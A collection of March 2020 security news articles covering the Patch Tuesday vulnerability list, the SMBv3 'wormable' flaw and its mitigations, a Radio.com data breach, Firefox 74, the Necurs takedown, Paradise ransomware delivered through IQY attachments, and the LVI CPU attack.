Users should install these security updates as soon as possible to protect Windows from known security risks.

For information about the non-security Windows updates, you can read about today's Windows 10 KB4540673 & KB4538461 cumulative updates.

The curious case of the missing CVE-2020-0796 vulnerability
Earlier today, BleepingComputer was told that Microsoft was releasing a fix for a wormable SMBv3 RCE vulnerability (CVE-2020-0796), but Microsoft never released it.

Not much information was available, but the vulnerability was very severe and felt like another EternalBlue type of vulnerability.

While Microsoft never shared any info, sites for security companies such as Fortinet and Cisco Talos did originally publish information about the vulnerability. Cisco Talos has since removed it.

"The exploitation of this vulnerability opens systems up to a "wormable" attack, which means it would be easy to move from victim to victim," Cisco Talos stated.

Unfortunately, not much other information is available other than allegedly disabling SMBv3 compression will mitigate the vulnerability and that everyone should block public access to port 445.

For more detailed information on this vulnerability and how to disable SMBv3 compression, please see our dedicated "Microsoft Leaks Info on Wormable Windows SMBv3 CVE-2020-0796 Flaw" article.

BleepingComputer has sent multiple emails to Microsoft but has not heard back yet with an official statement.

This month's interesting vulnerabilities
Stealing source code with CVE-2020-0872
The CVE-2020-0872 vulnerability titled "Remote Code Execution Vulnerability in Application Inspector" can be used by a malicious actor to try and steal the source code of files opened in Application Inspector.

"A remote code execution vulnerability exists in Application Inspector version v1.0.23 or earlier when the tool reflects example code snippets from third-party source files into its HTML output. An attacker who exploited it could send sections of the report containing code snippets to an external server.

To exploit the vulnerability, an attacker needs to convince a user to run Application Inspector on source code that includes a malicious third-party component."

More info can be found here.

Weaponized LNK files and Word documents
Two new vulnerabilities were fixed today that could allow attackers to create specially crafted .LNK files or Word documents that can perform code execution when opened.

The first vulnerability is CVE-2020-0684 and is titled "LNK Remote Code Execution Vulnerability" and allows an attacker to create malicious LNK files that can perform code execution. If we see a large spam campaign using .LNK files in the near future, we know someone came up with a PoC.

The second vulnerability is CVE-2020-0852 and is titled "Microsoft Word Remote Code Execution Vulnerability". This vulnerability would allow an attacker to create malicious Word documents that perform code execution simply by opening them.

Even worse, this vulnerability works in Outlook's preview pane.

The March 2020 Patch Tuesday Security Updates
Below is the full list of resolved vulnerabilities and released advisories in the March 2020 Patch Tuesday updates. To access the full description of each vulnerability and the systems that it affects, you can view the full report here.

Tag CVE ID CVE Title Severity
Azure CVE-2020-0902 Service Fabric Elevation of Privilege Important
Azure DevOps CVE-2020-0758 Azure DevOps Server and Team Foundation Services Elevation of Privilege Vulnerability Important
Azure DevOps CVE-2020-0815 Azure DevOps Server and Team Foundation Services Elevation of Privilege Vulnerability Important
Azure DevOps CVE-2020-0700 Azure DevOps Server Cross-site Scripting Vulnerability Important
Internet Explorer CVE-2020-0824 Internet Explorer Memory Corruption Vulnerability Critical
Microsoft Browsers CVE-2020-0768 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Dynamics CVE-2020-0905 Dynamics Business Central Remote Code Execution Vulnerability Critical
Microsoft Edge CVE-2020-0816 Microsoft Edge Memory Corruption Vulnerability Critical
Microsoft Exchange Server CVE-2020-0903 Microsoft Exchange Server Spoofing Vulnerability Important
Microsoft Graphics Component CVE-2020-0774 Windows GDI Information Disclosure Vulnerability Important
Microsoft Graphics Component CVE-2020-0788 Win32k Elevation of Privilege Vulnerability Important
Microsoft Graphics Component CVE-2020-0791 Windows Graphics Component Elevation of Privilege Vulnerability Important
Microsoft Graphics Component CVE-2020-0690 DirectX Elevation of Privilege Vulnerability Important
Microsoft Graphics Component CVE-2020-0853 Windows Imaging Component Information Disclosure Vulnerability Important
Microsoft Graphics Component CVE-2020-0877 Win32k Elevation of Privilege Vulnerability Important
Microsoft Graphics Component CVE-2020-0882 Windows GDI Information Disclosure Vulnerability Important
Microsoft Graphics Component CVE-2020-0883 GDI+ Remote Code Execution Vulnerability Critical
Microsoft Graphics Component CVE-2020-0881 GDI+ Remote Code Execution Vulnerability Critical
Microsoft Graphics Component CVE-2020-0880 Windows GDI Information Disclosure Vulnerability Important
Microsoft Graphics Component CVE-2020-0887 Win32k Elevation of Privilege Vulnerability Important
Microsoft Graphics Component CVE-2020-0898 Windows Graphics Component Elevation of Privilege Vulnerability Important
Microsoft Graphics Component CVE-2020-0885 Windows Graphics Component Information Disclosure Vulnerability Important
Microsoft Office CVE-2020-0850 Microsoft Word Remote Code Execution Vulnerability Important
Microsoft Office CVE-2020-0852 Microsoft Word Remote Code Execution Vulnerability Critical
Microsoft Office CVE-2020-0892 Microsoft Word Remote Code Execution Vulnerability Important
Microsoft Office CVE-2020-0851 Microsoft Word Remote Code Execution Vulnerability Important
Microsoft Office CVE-2020-0855 Microsoft Word Remote Code Execution Vulnerability Important
Microsoft Office SharePoint CVE-2020-0795 Microsoft SharePoint Reflective XSS Vulnerability Important
Microsoft Office SharePoint CVE-2020-0891 Microsoft SharePoint Reflective XSS Vulnerability Important
Microsoft Office SharePoint CVE-2020-0893 Microsoft Office SharePoint XSS Vulnerability Important
Microsoft Office SharePoint CVE-2020-0894 Microsoft Office SharePoint XSS Vulnerability Important
Microsoft Scripting Engine CVE-2020-0830 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0829 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0813 Scripting Engine Information Disclosure Vulnerability Important
Microsoft Scripting Engine CVE-2020-0826 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0827 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0825 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0831 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0847 VBScript Remote Code Execution Vulnerability Moderate
Microsoft Scripting Engine CVE-2020-0811 Chakra Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0828 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0848 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0823 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0832 Scripting Engine Memory Corruption Vulnerability Moderate
Microsoft Scripting Engine CVE-2020-0812 Chakra Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Scripting Engine CVE-2020-0833 Scripting Engine Memory Corruption Vulnerability Critical
Microsoft Windows CVE-2020-0897 Windows Work Folder Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0896 Windows Hard Link Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0871 Windows Network Connections Service Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0874 Windows GDI Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0876 Win32k Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0775 Windows Error Reporting Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0879 Windows GDI Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0793 Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0776 Windows Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0869 Media Foundation Memory Corruption Vulnerability Critical
Microsoft Windows CVE-2020-0861 Windows Network Driver Interface Specification (NDIS) Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0863 Connected User Experiences and Telemetry Service Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0860 Windows ActiveX Installer Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0857 Windows Search Indexer Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0858 Windows Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0865 Windows Work Folder Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0866 Windows Work Folder Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0864 Windows Work Folder Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0820 Media Foundation Information Disclosure Vulnerability Important
Microsoft Windows CVE-2020-0819 Windows Device Setup Manager Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0804 Windows Network Connections Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0779 Windows Installer Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0802 Windows Network Connections Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0803 Windows Network Connections Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0778 Windows Network Connections Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0809 Media Foundation Memory Corruption Vulnerability Critical
Microsoft Windows CVE-2020-0810 Diagnostic Hub Standard Collector Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0807 Media Foundation Memory Corruption Vulnerability Critical
Microsoft Windows CVE-2020-0808 Provisioning Runtime Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0797 Windows Work Folder Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0785 Windows User Profile Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0786 Windows Tile Object Service Denial of Service Vulnerability Important
Microsoft Windows CVE-2020-0787 Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0783 Windows UPnP Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0800 Windows Work Folder Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0801 Media Foundation Memory Corruption Vulnerability Critical
Microsoft Windows CVE-2020-0781 Windows UPnP Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0780 Windows Network List Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0777 Windows Work Folder Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0772 Windows Error Reporting Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0849 Windows Hard Link Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0845 Windows Network Connections Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0684 LNK Remote Code Execution Vulnerability Critical
Microsoft Windows CVE-2020-0769 Windows CSC Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0771 Windows CSC Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0841 Windows Hard Link Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0840 Windows Hard Link Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0806 Windows Error Reporting Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0843 Windows Installer Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0844 Connected User Experiences and Telemetry Service Elevation of Privilege Vulnerability Important
Microsoft Windows CVE-2020-0842 Windows Installer Elevation of Privilege Vulnerability Important
Open Source Software CVE-2020-0872 Remote Code Execution Vulnerability in Application Inspector Important
Other CVE-2020-0765 Remote Desktop Connection Manager Information Disclosure Vulnerability Moderate
Visual Studio CVE-2020-0789 Visual Studio Extension Installer Service Denial of Service Vulnerability Important
Visual Studio CVE-2020-0884 Microsoft Visual Studio Spoofing Vulnerability Important
Windows Defender CVE-2020-0763 Windows Defender Security Center Elevation of Privilege Vulnerability Important
Windows Defender CVE-2020-0762 Windows Defender Security Center Elevation of Privilege Vulnerability Important
Windows Diagnostic Hub CVE-2020-0854 Windows Mobile Device Management Diagnostics Elevation of Privilege Vulnerability Important
Windows IIS CVE-2020-0645 Microsoft IIS Server Tampering Vulnerability Important
Windows Installer CVE-2020-0814 Windows Installer Elevation of Privilege Vulnerability Important
Windows Installer CVE-2020-0773 Windows ActiveX Installer Service Elevation of Privilege Vulnerability Important
Windows Installer CVE-2020-0770 Windows ActiveX Installer Service Elevation of Privilege Vulnerability Important
Windows Installer CVE-2020-0822 Windows Language Pack Installer Elevation of Privilege Vulnerability Important
Windows Installer CVE-2020-0859 Windows Modules Installer Service Information Disclosure Vulnerability Important
Windows Installer CVE-2020-0868 Windows Update Orchestrator Service Elevation of Privilege Vulnerability Important
Windows Installer CVE-2020-0798 Windows Installer Elevation of Privilege Vulnerability Important
Windows Installer CVE-2020-0867 Windows Update Orchestrator Service Elevation of Privilege Vulnerability Important
Windows Kernel CVE-2020-0834 Windows ALPC Elevation of Privilege Vulnerability Important
Windows Kernel CVE-2020-0799 Windows Kernel Elevation of Privilege Vulnerability Important
Update 3/10/20: Fixed incorrect title


Microsoft Leaks Info on Wormable Windows SMBv3 CVE-2020-0796 Flaw
14.3.2020 
Bleepingcomputer  OS

Microsoft leaked info on a security update for a 'wormable' pre-auth remote code execution vulnerability found in the Server Message Block 3.0 (SMBv3) network communication protocol that reportedly should have been disclosed as part of this month's Patch Tuesday.

The vulnerability is due to an error when the SMBv3 handles maliciously crafted compressed data packets and it allows remote, unauthenticated attackers that exploit it to execute arbitrary code within the context of the application.

Even though the vulnerability advisory was not published by Microsoft (no explanation for this was released by Redmond so far), a number of security vendors part of Microsoft Active Protections Program who get early access to vulnerability information did release details on the security flaw tracked as CVE-2020-0796.

MalwareHunterTeam
@malwrhunterteam
CVE-2020-0796 - a "wormable" SMBv3 vulnerability.
Great...
😂

View image on Twitter
1,486
7:01 PM - Mar 10, 2020
Twitter Ads info and privacy
990 people are talking about this
Desktop and server Windows 10 versions impacted
Devices running Windows 10 Version 1903, Windows Server Version 1903 (Server Core installation), Windows 10 Version 1909, and Windows Server Version 1909 (Server Core installation) are impacted by this vulnerability according to a Fortinet advisory, although more versions should be affected given that SMBv3 was introduced in Windows 8 and Windows Server 2012.

"An attacker could exploit this bug by sending a specially crafted packet to the target SMBv3 server, which the victim needs to be connected to," Cisco Talos explained in their Microsoft Patch Tuesday report — this was later removed by the Talos security experts.

"The exploitation of this vulnerability opens systems up to a 'wormable' attack, which means it would be easy to move from victim to victim," they also added.

Fortinet says that upon successful exploitation, CVE-2020-0796 could allow remote attackers to take full control of vulnerable systems.

Due to Microsoft's secrecy, people are coming up with their own theories regarding the malware and its severity, some comparing it to EternalBlue, NotPetya, WannaCry, or MS17-010 (1, 2).

Others have already started coming up with names for the vulnerability such as SMBGhost, DeepBlue 3: Redmond Drift, Bluesday, CoronaBlue, and NexternalBlue.

Available CVE-2020-0796 mitigations
Until Microsoft will release a security update designed to patch the CVE-2020-0796 RCE vulnerability, Cisco Talos shared that disabling SMBv3 compression and blocking the 445 TCP port on client computers and firewalls should block attacks attempting to exploit the flaw.

While no proof-of-concept exploits have been released yet for this wormable SMBv3 RCE, we recommend implementing the mitigation measures shared by Cisco Talos until Microsoft will release an out-of-cycle security update to fix it seeing that almost all the info is out anyway.

BleepingComputer has reached out to Microsoft for more details but had not heard back at the time of this publication.

Brian in Pittsburgh
@arekfurt
If you're Microsoft you basically have little choice now but to release the patch for 2020-0796 out-of-cycle as soon as it meets quality standards, right? There's too much info out there to just hope somebody won't find it before April.

Fun times for sysadmins everywhere.

7
8:49 PM - Mar 10, 2020
Twitter Ads info and privacy
See Brian in Pittsburgh's other Tweets
Update: Microsoft published a security advisory with details on how to disable SMBv3 compression to protect servers against exploitation attempts.

You can disable compression on SMBv3 servers with this PowerShell command (no reboot required, does not prevent the exploitation of SMB clients):

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

What steps can I take to protect my network?

1. Block TCP port 445 at the enterprise perimeter firewall

TCP port 445 is used to initiate a connection with the affected component. Blocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. This can help protect networks from attacks that originate outside the enterprise perimeter. Blocking the affected ports at the enterprise perimeter is the best defense to help avoid Internet-based attacks. However, systems could still be vulnerable to attacks from within their enterprise perimeter.

2. Follow Microsoft guidelines to prevent SMB traffic leaving the corporate environment

Guidelines for blocking specific firewall ports to prevent SMB traffic from leaving the corporate environment


Entercom Radio Giant Says Data Breach Exposed User Credentials
14.3.2020 
Bleepingcomputer  Incindent

US radio giant Entercom reported a data breach that took place in August 2019 after an unauthorized party was able to access database backup files stored third-party cloud hosting services and containing Radio.com user credentials.

Entercom's national network is comprised of more than 235 radio stations broadcasting news, sports, and music across the country and live the Radio.com online live streaming service to over 170 million people each month.

"As one of the country’s two largest radio broadcasters, Entercom offers integrated marketing solutions and delivers the power of local connection on a national scale with coverage of close to 90% of persons 12+ in the top 50 markets," the company says.

Data breach exposes Radio.com users' credentials
Entercom says in a notice of data breach sent to affected customers and filed with California's Office of the Attorney General that the data breach was detected while investigating a cyberattack that took place in September 2019.

"As part of our investigation into that attack, we became aware of unauthorized activity relating to third-party cloud hosting services, which we use to store information relating to Radio.com users," Entercom explains.

"Specifically, our investigation determined that for approximately three (3) hours on August 4, 2019, an unauthorized actor accessed information relating to Radio.com users contained in database backup files."

The company discovered that an unauthorized actor was able to access the protected personal information of an undisclosed number of Radio.com users.

During the investigation conducted with the help of third-party data privacy and computer forensics specialists, Entercom discovered that the attacker was able to gain access to the names, usernames, and passwords of the impacted Radio.com users.

We sincerely regret any inconvenience this incident may cause you. We remain committed to safeguarding the information in our care and will continue to take steps to ensure the security of our systems. - Radio.com Customer Support Team

Following the data breach, the radio giant implemented several measures designed to prevent similar incidents in the future, including but not limited to passwords rotations, cloud services multifactor authentication and stronger password policies, and staff data security training.

Entercom also urges users who received the data breach notification letters to change their passwords for Radio.com accounts and for any other accounts where the same password was used.

This suggests that the credentials accessed during the data breach were stored in plain text, something BleepingComputer tried to confirm by reaching out to an Entercom spokesperson but did not hear back at the time of publication.

Previous attacks targeting Entercom
This is the third time in the last year that Entercom was targeted in a security incident. Last September, a cyberattack that had all the signs of a ransomware attack affected all Entercom offices across the country.

At the time, online reports said that the attackers asked for a $500,000 ransom and the attack led to the disruption of telephone and email communication, music scheduling, production, billing, and various other internal digital systems.

In response to a media inquiry, Entercom said that they are "experiencing a disruption of some IT systems, including email." However, an internal memo explaining what was happening to employees also prohibited them from sharing any of the information outside the company.

Just before Christmas eve, in December 2019, Entercom suffered a second cyberattack that led to Internet connectivity problems disabling email communication, access to files, and content to the radio network digital platforms.


Firefox 74 Released: Security Fixes, Improvements, and Fixes
14.3.2020 
Bleepingcomputer  Vulnerebility

Mozilla has released Firefox 74 today, March 10th, 2020, to the Stable desktop channel for Windows, macOS, and Linux with bug fixes, new features, and security fixes.

Included with this release are new features such as the Facebook container, the blocking of sideloaded add-ons, and the disabling of TLS 1.0 and 1.1 certificate support.

Windows, Mac, and Linux desktop users can upgrade to Firefox 74.0 by going to Options -> Help -> About Firefox and the browser will automatically check for the new update and install it when available.

Firefox 74

With the release of Firefox 74, the other development branches of Firefox have also moved up a version. This brings Firefox Beta to version 75 and the Nightly builds to version 76.

You can download Firefox 74 from the following links:

Firefox 74 for Windows 64-bit
Firefox 74 for Windows 32-bit
Firefox 74 for macOS
Firefox 74 for Linux 64-bit
Firefox 74 for Linux 32-bit
If the above links have not been updated for Firefox 74 as of yet, you can download it from their FTP release directory.

Below are the major changes in Firefox 73, but for those who wish to read the full changelog, you can do so here.

New Facebook Container
When users start Firefox 74 for the first time they will be greeted with a new screen asking if they wish to install the Facebook container.

Facebook Container promotion
Facebook Container promotion
When the Facebook container is installed, all of your Facebook sessions will be isolated so that they can no longer track your activities between different sites.

Or as Mozilla likes to say it:

It’s okay to like Facebook

If you still kinda like Facebook but don’t trust them, then try the Facebook Container extension by Firefox and make it harder for them to track you around the web.

Add-ons can no longer be sideloaded by external applications
Starting today with Firefox 74, add-ons can no longer be installed via external applications.

Malicious programs have long been installing unwanted add-ons or extensions without a user's knowledge. With this change, malware developers will no longer be able to install malicious extensions through adware bundles or other installers.

These are the new Firefox 74 changes related to add-ons:

Starting with Firefox 74, users will need to take explicit action to install the extensions they want, and will be able to remove previously sideloaded extensions when they want to.
Previously installed sideloaded extensions will not be uninstalled for users when they update to Firefox 74. If a user no longer wants an extension that was sideloaded, they must uninstall the extension themselves.
Firefox will prevent new extensions from being sideloaded.
Developers will be able to push updates to extensions that had previously been sideloaded. (If you are the developer of a sideloaded extension and you are now distributing your extension through your website or AMO, please note that you will need to separately update the sideloaded extension and the distributed extension.)
TLS 1.0 and 1.1 support is now disabled by default
With the more secure TLS 1.2 and TLS 1.3 protocols available, Mozilla is now disabling support for TLS 1.0 and TLS 1.1 certificates by default starting in this release.

When a user visits a page using an older TLS 1.0 1.1 certificate, Firefox will display an override button that allows you to 'Enable TLS 1.0 and 1.1' for that web site connection.

TLS override
TLS override
This override will continue to be available while Firefox collects telemetry to determine how many sites still use old certificates.

Eventually, the override button will be removed and all support for TLS 1.0 and TLS 1.1 will be removed.

Other bug fixes, improvements, and developer changes
In addition to new features, Firefox 74 also adds a variety of improvements and bug fixes, which are listed below:

Your login management has improved with the ability to reverse alpha sort (Name Z-A) in Lockwise, which you can access under Logins and Passwords.
Firefox now makes importing your bookmarks and history from the new Microsoft Edge browser on Windows and Mac simple.
Firefox now provides better privacy for your web voice and video calls through support for mDNS ICE by cloaking your computer’s IP address with a random ID in certain WebRTC scenarios.
We have fixed issues involving pinned tabs such as being lost. You should also no longer see them reorder themselves.
When a video is uploaded with a batch of photos on Instagram, the Picture-in-Picture toggle would sit atop of the “next” button. The toggle is now moved allowing you to flip through to the next image of the batch.
On Windows, Ctrl+I can now be used to open the Page Info window instead of opening the Bookmarks sidebar. Ctrl+B still opens the Bookmarks sidebar making keyboard shortcuts more useful for our users.
Firefox’s Debugger added support for debugging Nested Web Workers, so their execution can be paused and stepped through with breakpoints
Firefox has added support for the new JavaScript optional chaining operator (?.) and CSS text-underline-position.
Security vulnerabilities fixed
With the release of Firefox 74, Mozilla has also fixed a total of security vulnerabilities in the browser.

Of these vulnerabilities, 5 are classified as 'High', 6 as 'Moderate', and 1 is classified as 'Low'.

All of the vulnerabilities classified as High could lead to an exploitable crash or possibly remote code execution.


Windows 10 Cumulative Update KB4540673 & KB4538461 Released
14.3.2020 
Bleepingcomputer  OS

It's March 2020 and today is Patch Tuesday and Microsoft is rolling out a new cumulative update for all supported version of Windows. The cumulative update with security fixes is rolling out to PCs with November 2019 Update, May 2019 Update and October 2018 Update.

In March 2020 cumulative update for Windows 10 version 1909, 1903, and version 1809, there are only security enhancements for the system, browsers, core components and other basic functions.

Like every Windows Update, you can open the Settings app and click on the Windows Update option to install the patches. If you own multiple PCs or if you would like to patch the PCs manually, you can learn more about it here.

Build 18362.719 for Windows 10 v1903 & Build 18363.719 for Windows 10 v1909
March 2020 cumulative update (KB 4540673) for Windows 10 version 1909 brings up Build 18363.719 and Build 18362.719 for Windows 10 version 1903. The improvements are only security fixes:

Addresses an issue that prevents certain users from upgrading the OS because of corrupted third-party assemblies.
Security updates to Windows App Platform and Frameworks, Windows Media, Windows Silicon Platform, Microsoft Edge, Internet Explorer, Windows Fundamentals, Windows Authentication, Windows Peripherals, Windows Update Stack, and Windows Server.
Updates to improve security when using external devices (such as game controllers, printers, and web cameras).
Updates to improve security when using Microsoft Edge and Internet Explorer.
Updates for verifying user names and passwords.
Microsoft is aware of one bug:

Symptom Workaround
When using Windows Server containers with the March 10, 2020 updates, you might encounter issues with 32-bit applications and processes. For important guidance on updating Windows containers, please see Windows container version compatibility.
Build 17763.1098 for Windows 10 version 1809
If you're still on October Update, here's what new and improved in this release for you:

Updates to improve security when using Microsoft Edge and Internet Explorer.
Updates for verifying user names and passwords.
Updates to improve security when Windows performs basic operations.
Updates for storing and managing files.
Updates to improve security when using external devices (such as game controllers, printers, and web cameras).


Microsoft Takes Control of Necurs U.S.-Based Infrastructure
14.3.2020 
Bleepingcomputer  BigBrothers

Microsoft announced today that it took over the U.S.-based infrastructure used by the Necurs spam botnet for distributing malware payloads and infecting millions of computers.

A single Necurs-infected device was observed while sending roughly 3.8 million spam messages to more than 40.6 million targets during 58 days according to Microsoft's investigation.

"On Thursday, March 5, the U.S. District Court for the Eastern District of New York issued an order enabling Microsoft to take control of U.S.-based infrastructure Necurs uses to distribute malware and infect victim computers," Microsoft Corporate Vice President for Customer Security & Trust Tom Burt said.

"With this legal action and through a collaborative effort involving public-private partnerships around the globe, Microsoft is leading activities that will prevent the criminals behind Necurs from registering new domains to execute attacks in the future."

The Necurs botnet
Necurs is today's largest spam botnet, initially spotted around 2012 and linked by some sources to the TA505 cybercrime group, the operators behind the Dridex banking trojan.

Microsoft says that the botnet "has also been used to attack other computers on the internet, steal credentials for online accounts, and steal people’s personal information and confidential data."

The botnet was also seen delivering messages pushing fake pharmaceutical spam email, pump-and-dump stock scams, and “Russian dating” scams.

The Necurs malware is also known to be modular, with modules dedicated to delivering huge numbers of spam emails as Microsoft also observed, to redirecting traffic via HTTPS and SOCKS network proxies deployed on infected devices, as well as to launching DDoS attacks (distributed denial of service) via a module introduced in 2017 — no Necurs DDoS attacks have been detected so far.

Necurs' operators also provide a botnet-for-hire service through which they will also rent the botnet to other cybercriminals who use it to distribute various flavors of info stealing, cryptomining, and ransomware malicious payloads.

Microsoft's Necurs takedown
Microsoft was able to take control of the botnet domains by "analyzing a technique used by Necurs to systematically generate new domains through an algorithm."

This allowed them to predict more than six million domains the botnet's operators would have created and used as infrastructure during the next two years.

"Microsoft reported these domains to their respective registries in countries around the world so the websites can be blocked and thus prevented from becoming part of the Necurs infrastructure," Burt added.

"By taking control of existing websites and inhibiting the ability to register new ones, we have significantly disrupted the botnet."

Redmond has also joined forces with Internet Service Providers (ISPs) and other industry partners to help detect and remove the Necurs malware from as many infected computers as possible.

"This remediation effort is global in scale and involves collaboration with partners in industry, government and law enforcement via the Microsoft Cyber Threat Intelligence Program (CTIP)," Burt said.

"For this disruption, we are working with ISPs, domain registries, government CERTs and law enforcement in Mexico, Colombia, Taiwan, India, Japan, France, Spain, Poland and Romania, among others."


Paradise Ransomware Distributed via Uncommon Spam Attachment
14.3.2020 
Bleepingcomputer  Ransomware

Attackers have started to send Excel Web Query attachments in phishing campaigns to download and install the Paradise Ransomware on unsuspecting victims.

Paradise Ransomware is fairly old with activity going as far back as September 2017 when it was first reported by a victim in the BleepingComputer forums.

Since then, there has been a steady trickle of victims from this ransomware as can be seen from the submissions to the ransomware identification site ID-Ransomware.

Paradise Ransomware IQY file
Paradise Ransomware submissions to ID Ransomware
IQY attachments are easy to make and not often used
In a new spam campaign detected by cybersecurity firm LastLine, Paradise Ransomware distributors were found to be sending emails pretending to be offers, orders, or keys.

Attached to these emails were IQY attachments that when opened connect to a remote URL containing PowerShell commands that will be executed to download and install the Paradise Ransomware.

If you are not familiar with an IQY attachment, they are simply text files that instruct Excel to execute a command and use its output as a data source in an Excel spreadsheet.

The problem is that these files can also import data from remote URLs containing Excel formulas that can launch local applications, such as PowerShell commands, on the victim's computer.

As you can see from the Paradise Ransomware IQY file below, it only contains text that tells Excel that the data source is from the web and what URL to retrieve the data from.

Paradise Ransomware IQY file
Paradise Ransomware IQY file
This remote URL, though, contains an Excel formula that launches a PowerShell command on the victim's computer that downloads and runs an executable called key.exe.

Commands to execute
Commands to execute
As you can guess, the key.exe executable is the Paradise Ransomware and once executed will encrypt the files on the computer and drop a ransom note named ---==%$$$OPEN_ME_UP$$$==---.txt.

This ransom note, shown below, will contain a link that can be used to get the ransom demand and payment instructions.

Paradise Ransomware ransom note
Paradise Ransomware ransom note
IQY attachments have been seen in other malware distribution campaigns in the past such as Necurs, the Buran Ransomware, and the FlawedAmmy remote access trojan, but they are not commonly seen.

They can also be extremely effective, as the attachments are simply text files with no malicious code in them. This can make them harder to detect by security software.

"This campaign exhibited how weaponized IQYs can be an effective technique for an attacker to infiltrate a network. Since these IQYs contain no payload (just a URL), they can be challenging for organizations to detect. Organizations may have to rely on a 3rd party URL reputation service if they do not have appliances in place to analyze and interrogate these URLs," LastLine explained in their report.

Unless you specifically use IQY files in your organization or at home, it is suggested that you block them using security software or delete any emails that utilize them as attachments.

IQY attachments delivered by email from unknown people will almost always be malicious and should simply be deleted.


New LVI Intel CPU Data Theft Vulnerability Requires Hardware Fix
14.3.2020 
Bleepingcomputer  Vulnerebility

A novel class of attack techniques against modern Intel processors can allow threat actors to inject malicious data into applications via transient-execution attacks and steal sensitive data according to researchers.

The vulnerability dubbed LVI (short for Load Value Injection) and tracked as CVE-2020-0551 was discovered and reported to Intel on April 4, 2019, by researchers at the Worcester Polytechnic Institute, imec-DistriNet/KU Leuven, Graz University of Technology, University of Michigan, University of Adelaide and Data61, in no particular order.

Bitdefender researchers also independently discovered one variant of attack in the LVI class (LVI-LFB) and reported it to Intel in February 2020.

LVI attacks let attackers change the normal execution of programs to steal data that is normally meant to be kept private within SGX enclaves. Sensitive information that can be stolen this way includes passwords, private keys of certificates, and more.

Even though the Intel Software Guard eXtensions (SGX) feature in modern Intel processors that enables apps to run within secure and isolated enclaves is not necessary to launch an LVI attack, its presence makes the attack a lot easier.

"While LVI attacks in non-SGX environments are generally much harder to mount, we consider none of the adversarial conditions for LVI to be unique to Intel SGX," the researchers explain.

New Spectre-type data injection vulnerability
"LVI turns previous data extraction attacks around, like Meltdown, Foreshadow, ZombieLoad, RIDL and Fallout, and defeats all existing mitigations," the researchers explain.

"Instead of directly leaking data from the victim to the attacker, we proceed in the opposite direction: we smuggle — 'inject' — the attacker's data through hidden processor buffers into a victim program and hijack transient execution to acquire sensitive information, such as the victim’s fingerprints or passwords."

In short, LVI attacks allow injecting arbitrary data (much like Spectre attacks) within the memory loaded by a targeted application under certain conditions, making it possible for an attacker to hijack the control and data flow until the app rolls back all operations after detecting the mistake.

The new vulnerability bypasses all transient-execution attack mitigations developed for Intel's processors so far, like Meltdown, Spectre, Foreshadow, ZombieLoad, RIDL, and Fallout.

To exploit LVI, attackers would have to go through the following four steps:

Poison a hidden processor buffer with attacker values.
Induce a faulting or assisted load in the victim program.
